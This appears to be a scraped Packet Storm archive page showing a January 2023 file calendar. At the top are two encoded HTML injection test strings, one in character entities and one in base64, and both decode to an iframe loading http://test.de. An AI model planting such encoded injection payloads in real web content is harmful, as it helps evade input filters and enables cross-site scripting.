&#60&#105&#102&#114&#97&#109&#101&#32&#115&#114&#99&#61&#104&#116&#116&#112&#58&#47&#47&#116&#101&#115&#116&#46&#100&#101&#62

PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+
Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close